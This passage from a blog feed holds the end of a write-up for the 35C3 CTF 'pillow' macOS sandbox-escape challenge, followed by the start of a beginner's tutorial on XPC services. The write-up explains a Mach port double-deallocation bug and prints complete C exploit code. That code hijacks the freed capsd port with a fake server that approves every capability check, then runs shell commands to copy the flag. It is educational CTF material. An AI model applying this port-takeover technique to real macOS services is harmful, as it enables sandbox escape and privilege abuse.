class="line"></span><br><span class="line">            buffers_swapped = FALSE;</span><br><span class="line">            old_state = <span class="built_in">voucher_mach_msg_adopt</span>(&amp;bufRequest-&gt;Head);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 调用 MIG server </span></span><br><span class="line">            (<span class="type">void</span>) (*demux)(&amp;bufRequest-&gt;Head, &amp;bufReply-&gt;Head);</span><br><span class="line">            </span><br><span class="line">            <span class="comment">// 如果返回的 mach msg 不为 COMPLEX</span></span><br><span class="line">            <span class="keyword">if</span> (!(bufReply-&gt;Head.msgh_bits &amp; MACH_MSGH_BITS_COMPLEX)) &#123;</span><br><span class="line">                <span class="keyword">if</span> (bufReply-&gt;RetCode == MIG_NO_REPLY)</span><br><span class="line">                    bufReply-&gt;Head.msgh_remote_port = MACH_PORT_NULL;</span><br><span class="line">                <span class="comment">// 并且 MIG 调用存在错误，同时 Client 传来的消息是 COMPLEX</span></span><br><span class="line">                <span class="keyword">else</span> <span class="keyword">if</span> ((bufReply-&gt;RetCode != KERN_SUCCESS) &amp;&amp;</span><br><span class="line">                     (bufRequest-&gt;Head.msgh_bits &amp; MACH_MSGH_BITS_COMPLEX)) &#123;</span><br><span class="line">                    <span class="comment">/* destroy the request - but not the reply port */</span></span><br><span class="line">                    bufRequest-&gt;Head.msgh_remote_port = MACH_PORT_NULL;</span><br><span class="line">                    <span class="comment">// 调用 mach_msg_destroy 将其析构</span></span><br><span class="line">                    <span class="built_in">mach_msg_destroy</span>(&amp;bufRequest-&gt;Head);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            [...]</span><br><span class="line"></span><br><span class="line">        &#125; <span class="comment">/* while (mr == MACH_MSG_SUCCESS) */</span></span><br><span class="line"></span><br><span class="line">        [...]</span><br><span class="line"></span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">    &#125; <span class="comment">/* for(;;) */</span></span><br><span class="line"></span><br><span class="line">    (<span class="type">void</span>)<span class="built_in">vm_deallocate</span>(self,</span><br><span class="line">                (<span class="type">vm_address_t</span>) bufRequest,</span><br><span class="line">                request_alloc);</span><br><span class="line">    (<span class="type">void</span>)<span class="built_in">vm_deallocate</span>(self,</span><br><span class="line">                (<span class="type">vm_address_t</span>) bufReply,</span><br><span class="line">                reply_alloc);</span><br><span class="line">    <span class="keyword">return</span> mr;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="c-存在的问题">c. 存在的问题</h4><p>那么现在回到 <code>register_completion_listern</code> 函数中，我们再来看看哪里不对劲：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">register_completion_listener</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">const</span> <span class="type">char</span>* session_name, <span class="type">mach_port_t</span> listener, <span class="type">audit_token_t</span> client)</span> </span>&#123;</span><br><span class="line">    CFMutableDictionaryRef session = <span class="built_in">lookup_session</span>(session_name, client);</span><br><span class="line">    <span class="keyword">if</span> (!session) &#123;</span><br><span class="line">        <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), listener);</span><br><span class="line">        <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    CFNumberRef value = <span class="built_in">CFNumberCreate</span>(kCFAllocatorDefault, kCFNumberSInt32Type, &amp;listener);</span><br><span class="line">    <span class="built_in">CFDictionaryAddValue</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;listener&quot;</span>), value);</span><br><span class="line">    <span class="built_in">CFRelease</span>(value);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>很明显，既然该函数要在查询不到 session 时返回 <code>KERN_FAILUE</code>，那么就<strong>不应该对 listerner 这个 mach port 进行 <code>deallocation</code> 操作</strong>，这将使得<strong>该 mach port 被 deallocate 两次</strong>，一次是该函数中，另一次是在 MIG 其他处理过程中。</p><h4 id="d-接管-capsd-service-port">d. 接管 capsd_service_port</h4><p>根据上面的内容我们可以了解到，<code>register_completion_listener</code> 函数可能会导致对某个 mach port 的 double deallocation。</p><p>而又因为 <strong>mach port 是引用计数</strong>的，因此我们可以将 <code>capsd_service_port</code> 传给该函数，利用该函数的漏洞点，尝试二次释放掉 <code>capsd_service_port</code>。因为此时的 capsd_service_port 的引用计数为 2，二次释放将使得该 mach port 的引用计数归 0，导致该 mach port name 在当前 task 中被彻底释放。这样，该 mach port name 可被下一次创建的 mach port 所重用。</p><blockquote><p>shelld 中， capsd_service_port 的引用计数<strong>在执行 <code>register_completion_listener(..., capsd_service_port)</code> 时</strong>，之所以为 2，是因为：</p><ol><li>shelld 在 main 函数中执行 <code>bootstrap_look_up</code>，已经获取了一次 capsd_service_port 的 right</li><li>执行 register_completion_listener 时，client 将再发送一次 capsd_service_port 给 server</li></ol><p>故 server 将在两个不同的地方持有相同的 port，引用计数为2。</p></blockquote><p>因此，我们便可以<strong>尝试 劫持/接管 这个被释放掉的 mach port name</strong>，对 shelld 伪造一个 “capsd”，在 shelld 进行权限查询时返回错误结果，绕过 sandbox capability check。</p><p>花了点时间写了下利用，以下代码成功突破 shelld 的 sandbox capabilities check：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;../mig/shelld.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;../common/utils.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;../common/decls.h&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 伪造 capsd 必备函数</span></span><br><span class="line"><span class="function"><span class="type">boolean_t</span> <span class="title">capsd_server</span></span></span><br><span class="line"><span class="function">    <span class="params">(<span class="type">mach_msg_header_t</span> *InHeadP, <span class="type">mach_msg_header_t</span> *OutHeadP)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">grant_capability</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">audit_token_t</span> token, <span class="type">pid_t</span> target, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">has_capability</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">pid_t</span> pid, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg, <span class="type">int</span>* out)</span> </span>&#123;</span><br><span class="line">    *out = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span>* argv[])</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 获取 bootstrap port、 shelld port 和 capsd port</span></span><br><span class="line">    <span class="type">mach_port_t</span> bp, sp, cp;</span><br><span class="line">    <span class="built_in">task_get_special_port</span>(<span class="built_in">mach_task_self</span>(), TASK_BOOTSTRAP_PORT, &amp;bp);</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bp, <span class="string">&quot;net.saelo.shelld&quot;</span>, &amp;sp);</span><br><span class="line">    <span class="built_in">ASSERT_SUCCESS</span>(kr, <span class="string">&quot;shelld bootstrap_look_up&quot;</span>);</span><br><span class="line">    kr = <span class="built_in">bootstrap_look_up</span>(bp, <span class="string">&quot;net.saelo.capsd&quot;</span>, &amp;cp);</span><br><span class="line">    <span class="built_in">ASSERT_SUCCESS</span>(kr, <span class="string">&quot;capsd bootstrap_look_up&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 先提前准备好一个可用的 session</span></span><br><span class="line">    <span class="built_in">shelld_create_session</span>(sp, <span class="string">&quot;session&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 简单测试一下，肯定无法通过 capability 检测，因为 exp 没有 /bin/bash 的启动权限</span></span><br><span class="line">    kr = <span class="built_in">shell_exec</span>(sp, <span class="string">&quot;session&quot;</span>, <span class="string">&quot;echo &#x27;Hello World&#x27;&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(kr != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[*] shell_exec faild before attack.\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 尝试将 shelld 中的 capsd_service_port 释放</span></span><br><span class="line">    <span class="built_in">register_completion_listener</span>(sp, <span class="string">&quot;non-exist-session&quot;</span>, cp);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 创建一对新的 listener 和 listener_send_right</span></span><br><span class="line">    <span class="type">mach_port_t</span> listener, listener_send_right;</span><br><span class="line">    <span class="type">mach_msg_type_name_t</span> aquired_right;</span><br><span class="line">    <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;listener);</span><br><span class="line">    <span class="built_in">mach_port_extract_right</span>(<span class="built_in">mach_task_self</span>(), listener, MACH_MSG_TYPE_MAKE_SEND, &amp;listener_send_right, &amp;aquired_right);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* 启动一个 伪capsd_server </span></span><br><span class="line"><span class="comment">       需要注意的是，这里必须创建新的 dispatch queue 给 listener，</span></span><br><span class="line"><span class="comment">       因为 main queue 需要调用 dispatch_main 才能使用，但我们仍然需要使用控制流，因此不能调用 dispatch_main */</span></span><br><span class="line">    <span class="type">dispatch_queue_main_t</span> replyQueue = <span class="built_in">dispatch_queue_create</span>(<span class="string">&quot;replyQueue&quot;</span>, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, <span class="number">0</span>, replyQueue);</span><br><span class="line">    <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">        <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, capsd_server);</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="built_in">dispatch_resume</span>(source);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 尝试绕过 sandbox capabilities check</span></span><br><span class="line">    <span class="keyword">for</span>(<span class="type">size_t</span> cnt = <span class="number">0</span>; cnt &lt; <span class="number">10000</span>; ++cnt) &#123;</span><br><span class="line">        <span class="built_in">register_completion_listener</span>(sp, <span class="string">&quot;session&quot;</span>, listener_send_right);</span><br><span class="line">        <span class="comment">// 测试基本功能</span></span><br><span class="line">        kr = <span class="built_in">shell_exec</span>(sp, <span class="string">&quot;session&quot;</span>, <span class="string">&quot;echo &#x27;Hello World&#x27;&quot;</span>);</span><br><span class="line">        <span class="keyword">if</span>(kr == KERN_SUCCESS) &#123;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;[+] shell_exec success! test %zu times.\n&quot;</span>, cnt);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 如果无法使用，则将该 listener 从 shelld 中删除</span></span><br><span class="line">        <span class="built_in">unregister_completion_listener</span>(sp, <span class="string">&quot;session&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>运行效果如下，可以看到成功通过 capabilities check：</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108224804659.png" alt="image-20220108224804659"></p><p>需要注意的是，调试时，最好每次都重启一下 shelld，防止其内部旧数据影响调试。</p><h2 id="五、漏洞利用">五、漏洞利用</h2><p>综合上面的内容，我们最终可以拼接出一个完整 exploit：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;../mig/shelld.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;../common/utils.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;../common/decls.h&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 伪造 capsd 必备函数</span></span><br><span class="line"><span class="function"><span class="type">boolean_t</span> <span class="title">capsd_server</span></span></span><br><span class="line"><span class="function">    <span class="params">(<span class="type">mach_msg_header_t</span> *InHeadP, <span class="type">mach_msg_header_t</span> *OutHeadP)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">grant_capability</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">audit_token_t</span> token, <span class="type">pid_t</span> target, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">has_capability</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">pid_t</span> pid, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg, <span class="type">int</span>* out)</span> </span>&#123;</span><br><span class="line">    *out = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span>* argv[])</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 获取 bootstrap port、 shelld port 和 capsd port</span></span><br><span class="line">    <span class="type">mach_port_t</span> bp, sp, cp;</span><br><span class="line">    <span class="built_in">task_get_special_port</span>(<span class="built_in">mach_task_self</span>(), TASK_BOOTSTRAP_PORT, &amp;bp);</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bp, <span class="string">&quot;net.saelo.shelld&quot;</span>, &amp;sp);</span><br><span class="line">    <span class="built_in">ASSERT_SUCCESS</span>(kr, <span class="string">&quot;shelld bootstrap_look_up&quot;</span>);</span><br><span class="line">    kr = <span class="built_in">bootstrap_look_up</span>(bp, <span class="string">&quot;net.saelo.capsd&quot;</span>, &amp;cp);</span><br><span class="line">    <span class="built_in">ASSERT_SUCCESS</span>(kr, <span class="string">&quot;capsd bootstrap_look_up&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 先提前准备好一个可用的 session</span></span><br><span class="line">    <span class="type">char</span> long_session_name[<span class="number">4096</span>];</span><br><span class="line">    <span class="built_in">memset</span>(long_session_name, <span class="string">&#x27;a&#x27;</span>, <span class="built_in">sizeof</span>(long_session_name) - <span class="number">1</span>);</span><br><span class="line">    long_session_name[<span class="built_in">sizeof</span>(long_session_name) <span class="number">-1</span>] = <span class="number">0</span>;</span><br><span class="line">    <span class="built_in">shelld_create_session</span>(sp, long_session_name);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 尝试将 shelld 中的 capsd_service_port 释放</span></span><br><span class="line">    <span class="built_in">register_completion_listener</span>(sp, <span class="string">&quot;non-exist-session&quot;</span>, cp);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 创建一对新的 listener 和 listener_send_right</span></span><br><span class="line">    <span class="type">mach_port_t</span> listener, listener_send_right;</span><br><span class="line">    <span class="type">mach_msg_type_name_t</span> aquired_right;</span><br><span class="line">    <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;listener);</span><br><span class="line">    <span class="built_in">mach_port_extract_right</span>(<span class="built_in">mach_task_self</span>(), listener, MACH_MSG_TYPE_MAKE_SEND, &amp;listener_send_right, &amp;aquired_right);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* 启动一个 伪capsd_server </span></span><br><span class="line"><span class="comment">       需要注意的是，这里必须创建新的 dispatch queue 给 listener，</span></span><br><span class="line"><span class="comment">       因为 main queue 需要调用 dispatch_main 才能使用，但我们仍然需要使用控制流，因此不能调用 dispatch_main */</span></span><br><span class="line">    <span class="type">dispatch_queue_main_t</span> replyQueue = <span class="built_in">dispatch_queue_create</span>(<span class="string">&quot;replyQueue&quot;</span>, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, <span class="number">0</span>, replyQueue);</span><br><span class="line">    <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">        <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, capsd_server);</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="built_in">dispatch_resume</span>(source);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 尝试绕过 sandbox capabilities check</span></span><br><span class="line">    <span class="keyword">for</span>(<span class="type">size_t</span> cnt = <span class="number">0</span>; cnt &lt; <span class="number">10000</span>; ++cnt) &#123;</span><br><span class="line">        <span class="built_in">register_completion_listener</span>(sp, long_session_name, listener_send_right);</span><br><span class="line">        <span class="comment">// 测试基本功能</span></span><br><span class="line">        <span class="type">const</span> <span class="type">char</span> *payload = </span><br><span class="line">            <span class="string">&quot;chmod 777 /Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag &quot;</span></span><br><span class="line">            <span class="string">&quot;&amp;&amp; cp /Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag /tmp/pillow_flag &quot;</span></span><br><span class="line">            <span class="string">&quot;&amp;&amp; open -a TextEdit /tmp/pillow_flag&quot;</span>;</span><br><span class="line">        kr = <span class="built_in">shell_exec</span>(sp, long_session_name, payload);</span><br><span class="line">        <span class="keyword">if</span>(kr == KERN_SUCCESS) &#123;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;[+] shell_exec success! test %zu times.\n&quot;</span>, cnt);</span><br><span class="line"></span><br><span class="line">            <span class="built_in">exit</span>(EXIT_SUCCESS);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 如果无法使用，则将该 listener 从 shelld 中删除</span></span><br><span class="line">        <span class="built_in">unregister_completion_listener</span>(sp, long_session_name);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>编译参数：</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">CC = clang</span><br><span class="line"><span class="section">myexploit: myexploit.c</span></span><br><span class="line">    <span class="variable">$(CC)</span> -g -O0 myexploit.c ../mig/shelldUser.c ../mig/capsdServer.c  -o myexploit</span><br></pre></td></tr></table></figure><p>在沙箱中执行 exploit：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line">make</span><br><span class="line">sandbox-exec -f exploit.sb -D EXPLOIT_BIN=/Users/kiprey/Desktop/CTF/35c3ctf/pillow/exploit/myexploit ./myexploit</span><br></pre></td></tr></table></figure><p>运行结果：</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108232108975.png" alt="image-20220108232108975"></p><blockquote><p>调试 exp 时，最好每次在执行 exp 前都重启一下 shelld。</p></blockquote><h2 id="六、参考链接">六、参考链接</h2><ul><li><a href="https://paper.seebug.org/1453/">使用跨进程 XSS 逃逸 macOS Safari 沙箱 - Seebug</a></li><li><a href="https://github.com/LinusHenze/35C3_Writeups/tree/master/pillow">pillow writeup - github LinusHenze</a></li><li><a href="https://saelo.github.io/presentations/warcon18_dont_trust_the_pid.pdf">Don’t Trust the PID!  - @5aelo</a></li><li><a href="http://newosxbook.com/files/HITSB.pdf">Hack in the (sand)Box - Jonathan Levin</a></li><li><a href="https://wiki.mozilla.org/Sandbox/OS_X_Rule_Set">OSX Sandbox Rule Set - mozilla wiki</a></li><li><a href="https://www.chungkwong.cc/scheme.html">Scheme概览 - chungkwong</a></li><li><a href="https://reverse.put.as/wp-content/uploads/2011/09/Apple-Sandbox-Guide-v1.0.pdf">Apple’s Sandbox Guide v1.0</a></li><li><a href="https://ubrigens.com/posts/sandbox_coverage.html">Exploring Sandbox Coverage on macOS - ubrigens</a></li><li><a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=1417">Issue 1417: iOS/MacOS kernel double free due to IOSurfaceRootUserClient not respecting MIG ownership rules</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;pillow&lt;/code&gt;，是 35c3ctf 中的一道关于 macOS bootstrap Service 沙箱逃逸题目。本人将通过学习这一题来进一步了解Mac OSX XPC 和 Sandbox 机制。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;该题中包含了两个自定义 macOS 系统服务。要求攻击者劫持两个 XPC 服务之间的 IPC 连接，以达到沙箱逃逸的目的。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;题目链接 ： &lt;a href=&quot;https://github.com/saelo/35c3ctf/tree/master/pillow&quot;&gt;pillow - 35c3ctf github&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    
    <category term="mac" scheme="https://kiprey.github.io/tags/mac/"/>
    
    <category term="mach" scheme="https://kiprey.github.io/tags/mach/"/>
    
    <category term="ipc" scheme="https://kiprey.github.io/tags/ipc/"/>
    
    <category term="xpc" scheme="https://kiprey.github.io/tags/xpc/"/>
    
    <category term="sandbox" scheme="https://kiprey.github.io/tags/sandbox/"/>
    
  </entry>
  
  <entry>
    <title>MacOSX XPC 入门</title>
    <link href="https://kiprey.github.io/2022/01/mach_xpc_intro/"/>
    <id>https://kiprey.github.io/2022/01/mach_xpc_intro/</id>
    <published>2022-01-03T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.043Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><ul><li><p>XPC 是一种 OS X <strong>进程间通信技术</strong>，通过<strong>权限分离</strong>机制来对<strong>应用沙箱机制</strong>做了一个补充。其中，<strong>权限分离</strong>是根据每个部分所需的系统资源访问<strong>将应用程序分成多个部分</strong>，每个部分可以<strong>使用提前声明的权限（沙箱）</strong>。这种单个组件称为<strong>XPC 服务</strong>。</p><p>将应用程序分成多个部分，还可以提高程序的可靠性，防止程序的部分代码崩溃导致整个程序的退出。</p></li><li><p>每个 XPC 服务都位于自己的沙箱，即 XPC 服务有<strong>自己的容器</strong>和<strong>一组权限</strong>。包含在应用程序中 XPC 服务只能由应用程序自己访问。当应用程序启动时，系统会自动将它找到的每个 XPC 服务注册到应用程序可见的命名空间中。之后应用程序便可以与 XPC 服务通信并执行请求。</p></li><li><p>XPC 服务的特点：<strong>权限分离</strong> + <strong>错误隔离</strong></p></li><li><p>XPC 服务有 launchd 所管理，当 XPC 服务被意外终止（或者崩溃）后，该服务将会被 launchd 重启。</p></li></ul><span id="more"></span><h2 id="二、XPC-Service-使用入门">二、XPC Service 使用入门</h2><blockquote><p>由于网上的例子中 Object-C 的例子较多，而 C 语言的 XPC 例子较少，因此这里也用 Object-C 学习 XPC。</p><p>虽然还没学 Object-C 还不大会…</p></blockquote><h3 id="1-创建项目">1. 创建项目</h3><p>打开 XCode，新建项目，选择 XPC Service。</p><p><img src="/2022/01/mach_xpc_intro/image-20220103163708457.png" alt="image-20220103163708457"></p><p>之后输入 Product Name 和 Organization Identifier，最后的 Bundle Identifier 将会生成一个<strong>反向 DNS 名称格式</strong>的字符串。这个 Bundle ID 有大用，<strong>最好设置成应用程序的 subdomain（子域名）</strong>，不过这里先忽略。</p><p><img src="/2022/01/mach_xpc_intro/image-20220103163952631.png" alt="image-20220103163952631"></p><p>之后，XCode 将会存放一个 XPC 的示例代码，功能类似于 echo server。</p><p>接下来我们将慢慢研究这个示例代码，并顺带学习一下 Objective-c。</p><blockquote><p>要是对 Objective-C 不太熟就对着这个看 <a href="https://www.runoob.com/ios/ios-objective-c.html">Objective-C 基础知识 - 菜鸟教程</a></p></blockquote><h3 id="2-Service-简单示例">2. Service 简单示例</h3><h4 id="a-protocol">a. protocol</h4><p>在使用 XPC 前，必须先声明一个<strong>接口(interface)</strong>。接口主要有协议(Protocol)组成，描述了应该在远程进程中调用哪些方法。</p><p>以下是 XCode 自生成的 protocol 声明。这里声明了一个名为 <code>XPCDemoProtocol</code> 的协议，同时还定义了一个 <code>upperCaseString</code> 的接口函数：</p><blockquote><p>protocol 个人感觉有点类似于 C++ 中的<strong>虚类</strong>，不实现任何函数，只是简单的<strong>定义</strong>函数接口。</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">// XPCDemoProtocol.h</span><br><span class="line"></span><br><span class="line">#import 